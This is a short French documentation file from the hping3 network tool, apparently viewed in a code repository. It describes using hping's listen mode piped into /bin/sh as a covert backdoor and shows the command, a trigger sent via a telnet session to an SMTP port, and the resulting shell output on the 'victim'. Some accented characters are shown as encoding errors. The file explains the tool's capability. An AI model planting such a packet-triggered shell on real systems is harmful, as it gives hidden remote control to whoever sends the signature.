Files
hping3/docs/french/AS-BACKDOOR

38 lines
1.3 KiB
Plaintext
Raw Normal View History

2022-04-13 18:01:39 +08:00
hping peut <20>tre utilis<69> comme une backdoor (ndt : porte d<>rob<6F>e). Essayez
juste l'option -9 (--listen) et redirigez via un tube dans /bin/sh :
Mettez hping en mode listen (ndt : d'<27>coute) sur le syst<73>me victime.
victim# hping -I eth0 -9 mysign | /bin/sh
Chaque paquet qui contient "mysign" sera trait<69> par hping, tous les octets
qui suivent "mysign" dans les paquets seront envoy<6F>s dans la sortie
standard, ainsi par exemple je serai capable d'ex<65>cuter des commandes en
utilisant tous types de protocoles. Juste pour exemple je peux utiliser le
d<EFBFBD>mon smtpd pour ex<65>cuter 'ls' sur la victime.
evil$ telnet victim 25
Trying 192.168.1.1...
Connected to nano (192.168.1.1).
Escape character is '^]'.
220 nano.marmoc.net ESMTP Sendmail
mysignls;
sur la victime vous verrez :
victim# hping -I eth0 -9 mysign | /bin/sh
hping2 listen mode
bin cdrom etc home local-home mnt root tmp var
boot dev export lib lost+found proc sbin usr
: command not found
Comme vous pouvez le voir j'utilise 'ls;' puisque sinon le shell recevra
juste ls^M. Le ";" force l'ex<65>cution de la commande (du moins avec bash et
zsh, v<>rifiez votre shell pour plus d'informations).
Ceci fonctionne avec tous les types de paquets IP valides non filtr<74>s, le
niveau sup<75>rieur de protocole importe peu.
antirez <antirez@invece.org>